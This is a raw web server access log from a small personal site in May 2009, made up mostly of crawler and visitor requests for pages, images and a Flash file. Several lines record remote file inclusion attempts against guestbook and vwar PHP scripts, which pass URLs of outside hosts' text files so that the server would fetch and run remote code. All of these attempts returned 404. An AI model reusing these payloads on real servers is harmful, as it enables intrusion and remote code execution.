66.235.124.4 - - [15/May/2009:02:18:20 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
124.115.4.194 - - [15/May/2009:06:42:26 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.71.144 - - [15/May/2009:08:42:09 +0100] "GET /log/?N=A HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 239 3456
66.249.71.144 - - [15/May/2009:09:22:49 +0100] "GET /webalizer/usage_200801.html HTTP/1.1" 200 147495 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 147859
208.80.195.51 - - [15/May/2009:09:42:55 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; HbTools 4.8.0; IEMB3; yplus 5.1.04b)" 194 1587
218.249.36.194 - - [15/May/2009:10:06:47 +0100] "GET //guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 368 "-" "Mozilla/5.0" 164 614
122.153.212.195 - - [15/May/2009:10:15:53 +0100] "GET //guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 368 "-" "Mozilla/5.0" 164 614
122.153.212.195 - - [15/May/2009:10:16:00 +0100] "GET /log//guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 373 "-" "Mozilla/5.0" 168 619
122.153.212.195 - - [15/May/2009:10:16:05 +0100] "GET //guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 368 "-" "Mozilla/5.0" 164 614
122.153.212.195 - - [15/May/2009:10:16:05 +0100] "GET /log//guestbook1//admin.php?include_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 373 "-" "Mozilla/5.0" 168 619
38.100.41.113 - - [15/May/2009:10:55:32 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 169 1625
38.100.41.113 - - [15/May/2009:10:56:58 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 216 1178
66.249.71.144 - - [15/May/2009:11:03:59 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 104327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 104691
66.249.71.144 - - [15/May/2009:11:47:27 +0100] "GET /yellowdrag3a.swf HTTP/1.1" 404 363 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 247 647
66.249.71.144 - - [15/May/2009:14:16:37 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [15/May/2009:14:16:37 +0100] "GET /log/web.log.2 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 254
193.47.80.50 - - [16/May/2009:00:33:00 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [16/May/2009:00:33:00 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
124.115.0.23 - - [16/May/2009:05:48:14 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.71.144 - - [16/May/2009:07:37:19 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [16/May/2009:07:37:19 +0100] "GET /webalizer/usage_200610.html HTTP/1.1" 200 107332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 107694
66.249.71.144 - - [16/May/2009:08:05:08 +0100] "GET /log/?C=S;O=A HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
66.249.71.144 - - [16/May/2009:09:26:16 +0100] "GET /background%201a.jpg HTTP/1.1" 200 102928 "-" "Googlebot-Image/1.0" 197 103292
218.186.13.226 - - [16/May/2009:09:40:15 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "nutch.us/Nutch-1.0 (www.nutch.us; crawler@nutch.us)" 158 603
218.186.13.226 - - [16/May/2009:09:40:16 +0100] "GET / HTTP/1.0" 200 1266 "-" "nutch.us/Nutch-1.0 (www.nutch.us; crawler@nutch.us)" 148 1587
66.249.71.144 - - [16/May/2009:09:42:41 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1625
66.249.71.144 - - [16/May/2009:10:09:14 +0100] "GET /webalizer/usage_200808.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 308 283
208.80.195.42 - - [16/May/2009:10:35:47 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; SpamBlockerUtility 4.8.4)" 241 1587
66.249.71.144 - - [16/May/2009:11:03:39 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 109954 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 110318
89.74.142.42 - - [16/May/2009:14:13:06 +0100] "GET / HTTP/1.1" 200 1266 "http://www.megatorrent.info" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 229 1587
66.249.71.144 - - [16/May/2009:14:30:45 +0100] "GET /o3.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 256
216.129.119.14 - - [16/May/2009:14:51:29 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
81.190.201.69 - - [16/May/2009:14:46:10 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 281 7503697
91.184.49.167 - - [16/May/2009:18:27:01 +0100] "GET /log/error.log///vwar/backup/errors.php?error=http://isepic.tugaspeed.info/pixid.txt?? HTTP/1.1" 404 385 "-" "libwww-perl/5.805" 206 631
91.184.49.167 - - [16/May/2009:18:27:01 +0100] "GET ///vwar/backup/errors.php?error=http://isepic.tugaspeed.info/pixid.txt?? HTTP/1.1" 404 369 "-" "libwww-perl/5.805" 192 615
91.184.49.167 - - [16/May/2009:18:27:01 +0100] "GET /log///vwar/backup/errors.php?error=http://isepic.tugaspeed.info/pixid.txt?? HTTP/1.1" 404 375 "-" "libwww-perl/5.805" 196 621
74.6.17.154 - - [16/May/2009:18:33:25 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [16/May/2009:18:33:25 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 365 1587
74.6.17.154 - - [16/May/2009:20:59:13 +0100] "GET /log/ HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 369 3418
74.6.17.154 - - [17/May/2009:00:50:32 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [17/May/2009:00:50:32 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 376 1140
193.47.80.50 - - [17/May/2009:00:50:51 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [17/May/2009:00:50:51 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
77.88.26.26 - - [17/May/2009:04:38:46 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yandex/1.01.001 (compatible; Win16; I)" 155 641
77.88.26.26 - - [17/May/2009:04:38:46 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yandex/1.01.001 (compatible; Win16; I)" 450 1624
124.115.0.23 - - [17/May/2009:04:40:24 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.249.71.144 - - [17/May/2009:07:50:17 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [17/May/2009:07:50:17 +0100] "GET /log/web.log.4 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 254
66.249.71.144 - - [17/May/2009:11:04:51 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 113962 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 114326
208.80.195.32 - - [17/May/2009:11:36:39 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {44FBB9B2-8F30-4F8E-7159-9413B4759B0C}; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )" 205 1587
216.129.119.14 - - [17/May/2009:11:38:52 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
220.181.61.234 - - [17/May/2009:17:45:32 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
74.6.17.154 - - [17/May/2009:18:37:30 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [17/May/2009:18:37:31 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 365 1587
220.181.61.214 - - [17/May/2009:21:06:21 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
220.181.61.214 - - [17/May/2009:21:14:21 +0100] "GET / HTTP/1.1" 304 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 402 216
219.234.81.33 - - [17/May/2009:21:19:13 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
219.234.81.33 - - [17/May/2009:21:19:17 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" 376 1587
66.249.71.144 - - [17/May/2009:21:19:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [17/May/2009:21:19:44 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 155177 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 155539
74.6.17.154 - - [18/May/2009:03:07:21 +0100] "GET /feidad.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 468 216
124.115.4.194 - - [18/May/2009:03:14:01 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.235.124.4 - - [18/May/2009:03:27:26 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
66.235.124.4 - - [18/May/2009:03:27:41 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
58.61.164.207 - - [18/May/2009:03:50:52 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
66.249.71.144 - - [18/May/2009:11:03:46 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [18/May/2009:11:03:46 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 116890 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 117253
217.138.5.102 - - [18/May/2009:11:27:35 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 419 1625
217.138.5.102 - - [18/May/2009:11:27:36 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 374 154123
217.138.5.102 - - [18/May/2009:11:27:36 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 368 226047
217.138.5.102 - - [18/May/2009:11:27:40 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 334 641
217.138.5.102 - - [18/May/2009:11:31:54 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 466 1178
217.138.5.102 - - [18/May/2009:11:31:54 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 379 7503734
216.129.119.14 - - [18/May/2009:11:48:41 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
217.138.5.102 - - [18/May/2009:11:48:48 +0100] "GET /Margot.jpg HTTP/1.1" 404 357 "http://www.decodeine.com/dec4b.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 378 641
217.138.5.102 - - [18/May/2009:11:48:57 +0100] "GET /Margot.jpg HTTP/1.1" 404 357 "http://www.decodeine.com/dec4b.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 378 640
217.138.5.102 - - [18/May/2009:11:52:16 +0100] "GET /Margot.jpg HTTP/1.1" 404 357 "http://www.decodeine.com/dec4b.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19" 378 641
208.80.195.32 - - [18/May/2009:12:32:40 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Preload_01_07; (R1 1.3))" 132 1587
81.156.53.15 - - [18/May/2009:12:40:07 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 430 1625
81.156.53.15 - - [18/May/2009:12:40:07 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 284 154123
81.156.53.15 - - [18/May/2009:12:40:07 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 278 226046
81.156.53.15 - - [18/May/2009:12:40:10 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 220 641
74.6.17.154 - - [18/May/2009:19:29:06 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [18/May/2009:19:29:06 +0100] "GET /log/?N=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
66.249.71.144 - - [18/May/2009:21:24:13 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [18/May/2009:21:24:13 +0100] "GET /webalizer/usage_200812.html HTTP/1.1" 200 153211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 153573
94.194.206.242 - - [18/May/2009:23:15:04 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.co.uk/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=263&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dexploded%2Baxonometrics%26ndsp%3D18%26hl%3Den%26client%3Dfirefox-a%26rls%3Dcom.google:en-GB:official%26sa%3DN%26start%3D252%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 777 7503735
66.249.71.144 - - [19/May/2009:00:22:29 +0100] "GET /dec4.swf HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 239 639
66.249.71.144 - - [19/May/2009:00:22:29 +0100] "GET /dec3b.swf HTTP/1.1" 404 356 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 240 639
66.249.71.144 - - [19/May/2009:00:22:30 +0100] "GET /index2.html HTTP/1.1" 404 358 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 242 641
124.115.4.194 - - [19/May/2009:03:06:34 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
64.246.187.42 - - [19/May/2009:06:04:48 +0100] "GET /robots.txt HTTP/1.0" 404 357 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 212 603
64.246.187.42 - - [19/May/2009:06:04:49 +0100] "GET / HTTP/1.1" 206 1266 "http://whois.domaintools.com/decodeine.com" "SurveyBot/2.3 (Whois Source)" 351 1634
194.116.138.85 - - [19/May/2009:09:26:34 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 255 7503697
66.249.71.144 - - [19/May/2009:10:40:08 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [19/May/2009:10:40:08 +0100] "GET /log/web.log.2 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 254
66.249.71.144 - - [19/May/2009:11:03:48 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 118498 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 118862
216.129.119.14 - - [19/May/2009:11:58:32 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
91.104.44.182 - - [19/May/2009:12:57:10 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 375 1625
91.104.44.182 - - [19/May/2009:12:57:11 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 390 226046
91.104.44.182 - - [19/May/2009:12:57:11 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 396 154123
91.104.44.182 - - [19/May/2009:12:57:12 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 356 641
91.104.44.182 - - [19/May/2009:12:57:15 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 386 641
91.104.44.182 - - [19/May/2009:12:57:15 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 422 1177
91.104.44.182 - - [19/May/2009:12:57:16 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 431 7503734
91.104.44.182 - - [19/May/2009:12:57:32 +0100] "GET /hs01.jpg HTTP/1.1" 200 58624 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 58985
91.104.44.182 - - [19/May/2009:12:57:33 +0100] "GET /hs02.jpg HTTP/1.1" 200 24937 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 25298
91.104.44.182 - - [19/May/2009:12:57:34 +0100] "GET /hs03.jpg HTTP/1.1" 200 117599 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 117962
91.104.44.182 - - [19/May/2009:12:57:37 +0100] "GET /hs04.jpg HTTP/1.1" 200 70913 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 71276
91.104.44.182 - - [19/May/2009:12:57:40 +0100] "GET /hs05.jpg HTTP/1.1" 200 29807 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 30168
91.104.44.182 - - [19/May/2009:12:57:42 +0100] "GET /hs06.jpg HTTP/1.1" 200 77326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 77688
91.104.44.182 - - [19/May/2009:12:57:46 +0100] "GET /hs08.jpg HTTP/1.1" 200 56299 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 56660
91.104.44.182 - - [19/May/2009:12:57:48 +0100] "GET /hs09.jpg HTTP/1.1" 200 39779 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 40140
91.104.44.182 - - [19/May/2009:12:57:49 +0100] "GET /hs10.jpg HTTP/1.1" 200 32110 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 32471
91.104.44.182 - - [19/May/2009:12:57:51 +0100] "GET /hs11.jpg HTTP/1.1" 200 151835 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 152198
91.104.44.182 - - [19/May/2009:12:57:53 +0100] "GET /hs12.jpg HTTP/1.1" 200 143988 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 144351
91.104.44.182 - - [19/May/2009:12:57:55 +0100] "GET /hs13.jpg HTTP/1.1" 200 50131 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 50492
91.104.44.182 - - [19/May/2009:12:57:57 +0100] "GET /hs14.jpg HTTP/1.1" 200 169029 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 169392
91.104.44.182 - - [19/May/2009:12:58:00 +0100] "GET /hs15.jpg HTTP/1.1" 200 40087 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 40448
91.104.44.182 - - [19/May/2009:12:58:01 +0100] "GET /hs16.jpg HTTP/1.1" 200 157251 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 157614
91.104.44.182 - - [19/May/2009:12:58:04 +0100] "GET /hs17.jpg HTTP/1.1" 200 124968 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 125331
91.104.44.182 - - [19/May/2009:12:58:05 +0100] "GET /hs18.jpg HTTP/1.1" 200 123919 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 124282
91.104.44.182 - - [19/May/2009:12:58:07 +0100] "GET /hs19.jpg HTTP/1.1" 200 125900 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 126263
91.104.44.182 - - [19/May/2009:12:58:09 +0100] "GET /hs20.jpg HTTP/1.1" 200 152343 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" 383 152706
208.80.195.39 - - [19/May/2009:13:29:16 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 225 1587
220.181.61.234 - - [19/May/2009:17:31:44 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
216.129.119.14 - - [19/May/2009:18:05:45 +0100] "GET /webalizer/ HTTP/1.0" 200 11477 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 11801
